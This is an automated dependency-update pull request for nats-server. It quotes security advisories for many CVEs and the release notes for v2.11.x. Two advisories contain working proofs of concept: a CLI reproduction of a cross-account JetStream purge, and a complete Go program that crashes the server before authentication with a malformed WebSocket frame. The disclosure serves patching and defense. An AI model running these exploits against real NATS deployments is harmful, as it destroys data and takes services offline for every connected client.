
test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] #76

Open
renovate[bot] wants to merge 1 commit into main from renovate/go-github.com-nats-io-nats-server-v2-vulnerability


renovate bot commented Apr 15, 2025

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package: github.com/nats-io/nats-server/v2
Change: v2.10.17 → v2.11.15

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, the APIs are not properly restricted to system-account users. Instead, any authorized user can execute them, including across account boundaries, as long as that user merely has permission to publish on $JS.>.

Only the first appears to be of the highest severity. All are included in this single report as they likely share the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of JetStream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from JetStream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
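As a hedged illustration of the mitigation (account and user names are invented; subject names follow the JS API subjects discussed above, using standard NATS allow/deny permission syntax), an account-scoped admin can be granted JetStream management rights while being denied the system-level subjects:

```
accounts: {
  'TEST': {
    jetstream: true,
    users: [{
      user: 'admin_a', password: 'secret',
      permissions: {
        publish: {
          allow: ['$JS.API.>'],
          deny: ['$JS.API.ACCOUNT.>', '$JS.API.SERVER.>']
        }
      }
    }]
  }
}
```

A blanket grant of $JS.> (or >) would instead include the administrative subjects and reintroduce the exposure.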

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All three allow system-level access to non-system-account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge its own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined

CVE-2026-27571

Impact

The WebSocket handling of NATS messages supports compressed messages via the negotiated WebSocket compression. The implementation bounded the memory size of a NATS message, but did not independently bound the memory consumed by the intermediate stream while constructing a NATS message that might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bound the decompression so that it fails once the message grows too large, instead of continuing.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been; this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).

CVE-2026-33247

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an optional monitoring port, which provides access to sensitive data. The nats-server can take certain configuration options on the command-line instead of requiring a configuration file.

Problem Description

If a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled.

The /debug/vars end-point contains an unredacted copy of argv.

Patches

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

The NATS Maintainers are bemused at the concept of someone deploying a real configuration using --pass to avoid a config file, but also enabling monitoring.

Configure credentials inside a configuration file instead of via argv.

Do not enable the monitoring port if using secrets in argv.

Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

CVE-2026-29785

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When configured to accept leafnode connections (for a hub/spoke topology of multiple nats-servers), then the default configuration allows for negotiating compression; a malicious remote NATS server can trigger a server panic via that compression.

Problem Description

If the nats-server has the "leafnode" configuration enabled (not default), then anyone who can connect can crash the nats-server by triggering a panic. This happens pre-authentication and requires that compression be enabled (which it is, by default, when leafnodes are used).

Context: a NATS server can form various clustering topologies, including local clusters, and superclusters of clusters, but leafnodes allow for separate administrative domains to link together with limited data communication; eg, a server in a moving vehicle might use a local leafnode for agents to connect to, and sync up to a central service as and when available. The leafnode configuration here is where the central server allows other NATS servers to connect into it, almost like regular NATS clients. Documentation examples typically use port 7422 for leafnode communications.

Affected Versions

Version 2, prior to v2.11.14 or v2.12.5

Workarounds

Disable compression on the leafnode port:

leafnodes {
  port: 7422
  compression: off
}

CVE-2026-33215

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

Sessions and messages can be hijacked via MQTT Client ID malfeasance.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33216

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

For MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Ensure monitoring end-points are adequately secured.

Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

CVE-2026-33217

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

When using ACLs on message subjects, these ACLs were not applied in the $MQTT.> namespace, allowing MQTT clients to bypass ACL checks for MQTT subjects.
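For illustration (a hypothetical account and subject, using standard NATS permissions syntax), a deployment might scope an MQTT user like this, expecting the ACL to hold for MQTT traffic as well:

```
accounts: {
  'APP': {
    users: [{
      user: 'sensor', password: 'secret',
      permissions: {
        publish: ['telemetry.>'],
        subscribe: ['telemetry.>']
      }
    }]
  }
}
```

Prior to the fix, an MQTT client could bypass such a restriction for subjects reached via the internal $MQTT.> namespace.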

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33218

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers.

Problem Description

A client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

  1. Disable leafnode support if not needed.
  2. Restrict network connections to your leafnode port, if plausible without compromising the service offered.

CVE-2026-33219

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a WebSockets client service, used in deployments where browsers are the NATS clients.

Problem Description

A malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data.

This is a milder variant of NATS-advisory-ID 2026-02 (aka CVE-2026-27571; GHSA-qrvq-68c2-7grw).
That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Disable websockets if not required for project deployment.

CVE-2026-33222

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The persistent storage feature, JetStream, has a management API which has many features, amongst which are backup and restore.

Problem Description

Users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

If developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

CVE-2026-33223

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a Nats-Request-Info: message header, providing information about a request.

Problem Description

The NATS message header Nats-Request-Info: is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective.

An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33246

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers. NATS messages can have headers.

Problem Description

The nats-server offers a Nats-Request-Info: message header, providing information about a request. This is supposed to provide enough information to allow for account/user identification, such that NATS clients could make their own decisions on how to trust a message, provided that they trust the nats-server as a broker.

A leafnode connecting to a nats-server is not fully trusted unless the system account is bridged too. Thus identity claims should not have propagated unchecked.

Thus NATS clients relying upon the Nats-Request-Info: header could be spoofed.

This does not directly affect the nats-server itself, but the CVSS Confidentiality and Integrity scores are based upon what a hypothetical client might choose to do with this NATS header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33248

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

One authentication model supported is mTLS, deriving the NATS client identity from properties of the TLS Client Certificate.

Problem Description

When using mTLS for client identity, with verify_and_map to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass.

This does require a valid certificate from a CA already trusted for client certificates, and DN naming patterns which the NATS maintainers consider highly unlikely.

So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their DN construction patterns might conceivably be impacted.

Affected Versions

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

Developers should review their CA issuing practices.

CVE-2026-27889

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When using WebSockets, a malicious client can trigger a server crash with crafted frames, before authentication.

Problem Description

A missing sanity check on a WebSockets frame could trigger a server panic in the nats-server. This happens before authentication, and so is exposed to anyone who can connect to the websockets port.

Affected versions

Version 2 from v2.2.0 onwards, prior to v2.11.14 or v2.12.5

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points. If able to do so, a defense in depth of restricting either of these will mitigate the attack.

Solution

Upgrade the NATS server to a fixed version.

Credits

This was reported to the NATS maintainers by GitHub user Mistz1.
Also independently reported by GitHub user jiayuqi7813.


Report by @Mistz1

Summary

An unauthenticated remote attacker can crash the entire nats-server process by sending a single malicious WebSocket frame (15 bytes after the HTTP upgrade handshake). The server fails to validate the RFC 6455 §5.2 requirement that the most significant bit of a 64-bit extended payload length must be zero. The resulting uint64→int conversion produces a negative value, which bypasses the bounds clamp and triggers an unrecovered panic in the connection's goroutine, killing the entire server process and disconnecting all clients. This affects all platforms (64-bit and 32-bit).

Details

Vulnerable code: server/websocket.go line 278

r.rem = int(binary.BigEndian.Uint64(tmpBuf))

When a WebSocket frame uses the 64-bit extended payload length (length code 127), the server reads 8 bytes and casts the raw uint64 directly to int with no validation. RFC 6455 §5.2 states: "the most significant bit MUST be 0" — but nats-server never checks this.

Attack chain:

  1. The attacker sends a WebSocket frame with the MSB set in the 64-bit length field (e.g., 0x8000000000000001).

  2. At line 278, int(0x8000000000000001) produces -9223372036854775807 on 64-bit Go (two's complement reinterpretation — Go does not panic on integer conversion overflow).

  3. r.rem is now negative. At line 307–311, the bounds clamp fails:

    n = r.rem                    // n = -9223372036854775807
    if pos+n > max {             // 14 + (-huge) = negative, NOT > max → FALSE
        n = max - pos            // clamp NEVER fires
    }
    b = buf[pos : pos+n]         // buf[14 : -9223372036854775793] → PANIC

    The addition pos + n wraps to a negative value (Go signed integer overflow is defined behavior — it wraps silently). Since the negative result is never greater than max, the clamp is skipped. The slice expression at line 311 reaches the Go runtime bounds check, which panics.

  4. There is no defer recover() anywhere in the goroutine chain:

    The unrecovered panic propagates to Go's runtime, which calls os.Exit(2). The entire nats-server process terminates.

  5. The WebSocket frame is parsed in wsRead() called from readLoop(), which starts immediately after the HTTP upgrade — before any NATS CONNECT authentication. No credentials are required.

Why 15 bytes, not 14: The 14-byte frame header (opcode + length + mask key) exactly fills the read buffer on the first call, so pos == max and the payload loop at line 303 (if pos < max) is skipped. The poisoned r.rem persists in the wsReadInfo struct. One additional byte of "payload" is needed so that pos < max on either the same or next read, entering the panic path at line 311.

PoC

Server configuration (test-ws.conf):

listen: 127.0.0.1:4222

websocket {
    listen: "127.0.0.1:9222"
    no_tls: true
}

Start the server:

nats-server -c test-ws.conf

Exploit (poc_ws_crash.go):

package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "127.0.0.1:9222"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Printf("[*] Connecting to %s...\n", target)
	conn, err := net.DialTimeout("tcp", target, 5*time.Second)
	if err != nil {
		fmt.Printf("[-] Connection failed: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	// WebSocket upgrade
	req, _ := http.NewRequest("GET", "http://"+target, nil)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	req.Header.Set("Sec-WebSocket-Key", "dGhlIHNhbXBsZSBub25jZQ==")
	req.Header.Set("Sec-WebSocket-Version", "13")
	req.Header.Set("Sec-WebSocket-Protocol", "nats")
	req.Write(conn)

	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	resp, err := http.ReadResponse(bufio.NewReader(conn), req)
	if err != nil || resp.StatusCode != 101 {
		fmt.Printf("[-] Upgrade failed\n")
		os.Exit(1)
	}
	fmt.Println("[+] WebSocket established")
	conn.SetReadDeadline(time.Time{})

	// Malicious frame: FIN+Binary, MASK+127, 8-byte length with MSB set, mask key, 1 payload byte
	frame := make([]byte, 15)
	frame[0] = 0x82                                             // FIN + Binary
	frame[1] = 0xFF                                             // MASK + 127 (64-bit length)
	binary.BigEndian.PutUint64(frame[2:10], 0x8000000000000001) // MSB set
	frame[10] = 0xDE                                            // Mask key
	frame[11] = 0xAD
	frame[12] = 0xBE
	frame[13] = 0xEF
	frame[14] = 0x41                                            // 1 payload byte

	fmt.Printf("[*] Sending: %x\n", frame)
	conn.Write(frame)

	time.Sleep(2 * time.Second)

	// Verify crash
	conn2, err := net.DialTimeout("tcp", target, 3*time.Second)
	if err != nil {
		fmt.Println("[!!!] SERVER IS DOWN — full process crash confirmed")
		os.Exit(0)
	}
	conn2.Close()
	fmt.Println("[-] Server still running")
}

Run:

go build -o poc_ws_crash poc_ws_crash.go
./poc_ws_crash

Observed server output before termination:

panic: runtime error: slice bounds out of range [:-9223372036854775793]

goroutine 13 [running]:
github.com/nats-io/nats-server/v2/server.(*client).wsRead(...)
        server/websocket.go:311 +0xa93
github.com/nats-io/nats-server/v2/server.(*client).readLoop(...)
        server/client.go:1434 +0x768
github.com/nats-io/nats-server/v2/server.(*Server).startGoRoutine.func1()
        server/server.go:4078 +0x32

Tested against: nats-server v2.14.0-dev (commit a69f51f), Go 1.25.7, linux/amd64.

Impact

Vulnerability type: Pre-authentication remote denial of service (full process crash).

Who is impacted: Any nats-server deployment with WebSocket listeners enabled (websocket { ... } in config), including MQTT-over-WebSocket. This is an increasingly common configuration for browser-based and IoT clients. The attacker needs only TCP access to the WebSocket port — no credentials, no valid NATS client, no TLS client certificate.

Severity: A single unauthenticated TCP connection sending 15 bytes crashes the entire server process. All connected clients (NATS, WebSocket, MQTT, cluster routes, gateways, leaf nodes) are immediately disconnected. JetStream in-flight acknowledgments are lost and Raft consensus is disrupted in clustered deployments. The attack is repeatable on every server restart.

Affected platforms: All — confirmed on 64-bit (linux/amd64); 32-bit platforms (linux/386, linux/arm) are also affected with additional frame-desync consequences.

(NATS retains the original external report below the cut, with exploit details. This issue was also independently reported by GitHub user @jiayuqi7813 before publication; they provided a Python exploit.)


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.11.15

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
  • golang.org/x/crypto v0.49.0 (#​7953)
  • github.com/nats-io/jwt/v2 v2.8.1 (#​7960)
  • github.com/antithesishq/antithesis-sdk-go v0.6.0-default-no-op
  • github.com/klauspost/compress v1.18.4
  • github.com/nats-io/nats.go v1.49.0
  • github.com/nats-io/nkeys v0.4.15
CVEs
Improved

JetStream

  • The stream peer-remove command now accepts a peer ID as well as a server name (#​7952)

MQTT

  • Protocol compliance has been improved, including more error handling on invalid or malformed MQTT packets (#​7933)
Fixed

General

  • Improved handling of duplicate headers
  • A correctness bug when validating relative distinguished names has been fixed
  • Secrets are now redacted correctly in trace logging (#​7942)
  • The expvar endpoint on the monitoring port now correctly redacts secrets from the command line arguments
  • Trace headers are no longer incorrectly parsed when hitting max payload (#​7954)
  • The Nats-Trace-Dest message header for message tracing now requires that the client have publish permissions to the specified subject, an error is returned otherwise

JetStream

  • A panic when paginating on various JetStream API endpoints has been fixed
  • An interior path traversal bug that could occur when purging JetStream accounts has been fixed
  • Meta snapshot apply errors are now surfaced correctly so that the cluster monitor does not advance the applied index (#​7944)
  • Fixed an issue where extremely large JetStream reservations could overflow and violate tier limits
  • Stream restores now ensure that the stream name in the restore subject matches that of the restored snapshot archive
  • Stream ingest now correctly strips a NATS status header if present, avoiding incorrect classification of sourced or mirrored messages as control traffic
  • Stream sourcing now works correctly when sourcing into a stream with the Discard New Per Subject discard policy (#​7896)

Leafnodes

  • A panic when receiving a loop detection error before a connect message has been fixed
  • Messages from leafnodes to non-shared service imports now correctly rebuild the request info header
  • Leafnodes will now back off on receiving a minimum version required error, no longer requiring blocking the readloop (#​7970)

MQTT

  • SUB and UNSUB packets now correctly detect and reject the Packet Identifier being set to 0 (#​7805)
  • A panic that could occur when processing invalid fixed32 or fixed64 fields has been fixed (#​7941)
  • Persisted MQTT sessions can no longer be restored by a non-matching client ID
  • Restrict the implicit permissions for MQTT clients to $MQTT.sub. and $MQTT.deliver.pubrel. prefixes
  • MQTT passwords are no longer exposed in the JWT field of monitoring endpoints or advisory messages
  • NATS special characters (., >, *, spaces, tabs) are no longer permitted in MQTT client IDs
  • MQTT session flapping detection now uses monotonic time, fixing cases where it could be sensitive to NTP adjustments or clock drifts

WebSockets

  • WebSocket protocol parsing no longer relies on potentially unbounded in-memory allocations from compressed or uncompressed frames
Complete Changes

v2.11.14

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
CVEs
Fixed

Leafnodes

  • Receiving a leafnode subscription before negotiating compression should no longer result in a server panic

WebSockets

  • Fix invalid parsing of 64-bit payload lengths, which could lead to a server panic
  • Correctly reject compressed frames when compression was not negotiated as a part of the handshake
  • The Origin header validation now validates the protocol scheme as well as host and port
  • Gracefully handle failed connection upgrades
  • The CLOSE frame lengths and status codes are now validated correctly
  • The compressor state is correctly reset when a max payload error occurs
  • Empty compressed buffers should no longer result in a server panic
Complete Changes

v2.11.12

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nkeys v0.4.12 (#​7578)
  • github.com/antithesishq/antithesis-sdk-go v0.5.0-default-no-op (#​7604)
  • github.com/klauspost/compress v1.18.3 (#​7736)
  • golang.org/x/crypto v0.47.0 (#​7736)
  • golang.org/x/sys v0.40.0 (#​7736)
  • github.com/google/go-tpm v0.9.8 (#​7696)
  • github.com/nats-io/nats.go v1.48.0 (#​7696)
Added

General

  • Added WebSocket-specific ping interval configuration with ping_interval in the websocket block (#​7614)

Monitoring

  • Added tls_cert_not_after to the varz monitoring endpoint for showing when TLS certificates are due to expire (#​7709)
Improved

JetStream

  • The scan for the last sourced message sequence when setting up a subject-filtered source is now considerably faster (#​7553)
  • Consumer interest checks on interest-based streams are now significantly faster when there are large gaps in interest (#​7656)
  • Creating consumer file stores no longer contends on the stream lock, improving consumer create performance on heavily loaded streams (#​7700)
  • Recalculating num pending with updated filter subjects no longer gathers and sorts the subject filter list twice (#​7772)
  • Switching to interest-based retention will now remove no-interest messages from the head of the stream (#​7766)

MQTT

  • Retained messages now work correctly even when sourced from a different account with a subject transform applied (#​7636)
Fixed

General

  • WebSocket connections will now correctly limit the buffer size during decompression (#​7625, thanks to Pavel Kohout at Aisle Research)
  • The config parser now correctly detects and errors on self-referencing environment variables (#​7737)
  • Internal functions for handling headers should no longer corrupt message bodies if appended (#​7752)

JetStream

  • A protocol error caused by an invalid transform of acknowledgement reply subjects when originating from a gateway connection has been fixed (#​7579)
  • The meta layer will now only respond to peer remove requests after quorum has been reached (#​7581)
  • Invalid subject filters containing non-terminating full wildcard no longer produce unexpected matches (#​7585)
  • A data race when creating a stream in clustered mode has been fixed (#​7586)
  • A panic when processing snapshots with missing nodes or assignments has been fixed (#​7588)
  • When purging whole message blocks, the subject tracking and scheduled messages are now updated correctly (#​7593)
  • The filestore will no longer unexpectedly lose writes when AsyncFlush is enabled after a process pause (#​7594)
  • The filestore will now process message removal on disk before updating accounting, which improves error handling (#​7595, #​7601)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • A data race has been fixed in the stream health check (#​7619)
  • Tombstones are now correctly written for recovering the sequences after compacting or purging an almost-empty stream to seq 2 (#​7627)
  • Combining skip sequences and compactions will no longer overwrite the block at the wrong offset, correcting a corrupt record state error (#​7627)
  • Compactions that reclaim over half of the available space now use an atomic write to avoid losing messages if killed (#​7627)
  • Filestore compaction should no longer result in "no idx present" cache errors (#​7634)
  • Filestore compaction now correctly adjusts the high and low sequences for a message block, as well as cleaning up the deletion map accordingly (#​7634)
  • Potential stream desyncs that could happen during stream snapshotting have been fixed (#​7655)
  • Raft will no longer allow multiple membership changes to take place concurrently (#​7565, #​7609)
  • Raft will no longer count responses from peer-removed nodes towards quorum (#​7589)
  • Raft quorum counting has been refactored so the implicit leader ack is now only counted if still a part of the membership (#​7600)
  • Raft now writes the peer state immediately when handling a peer-remove to ensure the removed peers cannot unexpectedly reappear after a restart (#​7602)
  • Add peer operations to Raft can no longer result in disjoint majorities (#​7632)
  • Raft groups should no longer readmit a previously removed peer if a heartbeat occurs between the peer removal and the leadership transfer (#​7649)
  • Raft single node elections now transition into leader state correctly (#​7642)
  • R1 streams will no longer incorrectly drift last sequence when exceeding limits (#​7658)
  • Deleted streams are no longer wrongfully revived if stalled on an upper-layer catchup (#​7668)
  • A panic that could happen when receiving a shutdown signal while JetStream is still starting up has been fixed (#​7683)
  • JetStream usage stats now correctly reflect purged whole blocks when optimising large purges (#​7685)
  • Recovering JetStream encryption keys now happens independently of the stream index recovery, fixing some cases where the key could be reset unexpectedly if the index is rebuilt (#​7678)
  • Non-replicated file-based consumers now detect corrupted state on disk and are deleted automatically (#​7691)
  • Raft no longer allows a repeat vote for the same term after a stepdown or leadership transfer (#​7698)
  • Replicated consumers are no longer incorrectly deleted if they become leader just as JetStream is about to shut down (#​7699)
  • Fixed an issue where a single truncated block could prevent storing new messages in the filestore (#​7704)
  • Fixed a concurrent map iteration/write panic that could occur on WorkQueue streams during partitioning (#​7708)
  • Fixed a deadlock that could occur on shutdown when adding streams (#​7710)
  • A data race on mirror consumers has been fixed (#​7716)
  • JetStream no longer leaks subscriptions in a cluster when a stream import/export is set up that overlaps the $JS.> namespace (#​7720)
  • The filestore will no longer waste CPU time rebuilding subject state for WALs (#​7721)
  • Configuring cluster_traffic in config mode has been fixed (#​7723)
  • Subject intersection no longer misses certain subjects with specific patterns of overlapping filters, which could affect consumers, num pending calculations, etc. (#​7728, #​7741, #​7744, #​7745)
  • Multi-filtered next message lookups in the filestore can now skip blocks when faster to do so (#​7750)
  • The binary search for start times now handles deleted messages correctly (#​7751)
  • Consumer updates will now only recalculate num pending when the filter subjects are changed (#​7753)
  • Consumers on replicated interest or workqueue streams should no longer lose interest or cause desyncs after having their filter subjects updated (#​7773)
  • Interest-based streams will no longer start more check interest state goroutines when there are existing running ones (#​7769)
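
Several of the fixes above (#​7585, #​7728 and related) concern subject-filter matching with the `*` and `>` wildcards. As a point of reference, here is a minimal sketch of NATS-style subject matching semantics in Python — an illustration of the matching rules, not the server's actual implementation, which uses a sublist trie:

```python
def subject_matches(filter_subject: str, subject: str) -> bool:
    """NATS-style match: '*' matches exactly one token; '>' matches
    one or more trailing tokens and is only valid as the final token."""
    ftoks = filter_subject.split(".")
    stoks = subject.split(".")
    for i, ft in enumerate(ftoks):
        if ft == ">":
            # A non-terminating '>' is an invalid filter (cf. #7585)
            return i == len(ftoks) - 1 and len(stoks) > i
        if i >= len(stoks) or (ft != "*" and ft != stoks[i]):
            return False
    return len(ftoks) == len(stoks)

print(subject_matches("orders.*", "orders.new"))     # True
print(subject_matches("orders.>", "orders.eu.new"))  # True
print(subject_matches("orders.>", "orders"))         # False
```

Note that `>` must consume at least one token, which is why `orders.>` does not match the bare subject `orders`.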

MQTT

  • The maximum payload size is now correctly enforced for MQTT clients (#​7555, thanks to @​yixianOu)
  • Fixed a panic that could occur when reloading config if the user did not have permission to access retained messages (#​7596)
  • Fixed account mapping for JetStream API requests when traversing non-JetStream-enabled servers (#​7598)
  • QoS0 messages are now mapped correctly across account imports/exports with subject mappings (#​7605)
  • Loading retained messages no longer fails after restarting due to last sequence checks (#​7616)
  • A bug which could corrupt retained messages in clustered deployments has been fixed (#​7622)
  • Permissions to $MQTT. subscriptions are now handled implicitly, with the exception of deny ACLs, which can still restrict access (#​7637)
  • A bug where QoS2 messages could not be retrieved after a server restart has been fixed (#​7643)
Complete Changes

v2.11.11

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

JetStream

